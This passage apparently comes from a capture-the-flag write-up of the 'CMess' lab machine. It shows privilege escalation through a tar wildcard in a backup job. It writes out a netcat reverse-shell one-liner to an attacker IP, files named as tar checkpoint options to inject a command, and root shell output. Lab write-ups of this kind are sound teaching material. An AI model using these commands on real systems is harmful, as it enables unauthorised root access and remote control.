Wildcard Exploit in TAR
The issue arises due to the presence of the wildcard bit (*)
This can easily exploited as the wildcard bit (*) includes everything
andre@cmess:~$ cd backup/
andre@cmess:~/backup$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.9.1.180 1234 >/tmp/f' > pe.shI will create a Bash script containing a reverse shell inside the /home/andre/backup directory; pe.sh
andre@cmess:~/backup$ echo "" > "--checkpoint-action=exec=sh pe.sh"
andre@cmess:~/backup$ echo "" > "--checkpoint=1"
andre@cmess:~/backup$ ll
total 24
drwxr-x--- 2 andre andre 4096 Jul 22 06:09 ./
drwxr-x--- 4 andre andre 4096 Feb 9 2020 ../
-rw-rw-r-- 1 andre andre 1 Jul 22 06:09 --checkpoint=1
-rw-rw-r-- 1 andre andre 1 Jul 22 06:09 --checkpoint-action=exec=sh pe.sh
-rwxr-x--- 1 andre andre 51 Feb 9 2020 note*
-rw-rw-r-- 1 andre andre 73 Jul 22 06:09 pe.shThen create 2 files; --checkpoint=1 and --checkpoint-action=exec=sh /home/andre/pe.sh
cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz * --checkpoint=1 --checkpoint-action=exec=sh pe.shThis would look like this in the full command
┌──(kali㉿kali)-[~/archive/thm/cmess/andre_backup]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.9.1.180] from (UNKNOWN) [10.10.124.31] 38606
sh: 0: can't access tty; job control turned off
# whoami
root
# hostname
cmess
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
link/ether 02:8f:7f:aa:35:83 brd ff:ff:ff:ff:ff:ff
inet 10.10.124.31/16 brd 10.10.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::8f:7fff:feaa:3583/64 scope link
valid_lft forever preferred_lft foreverSystem Level Compromise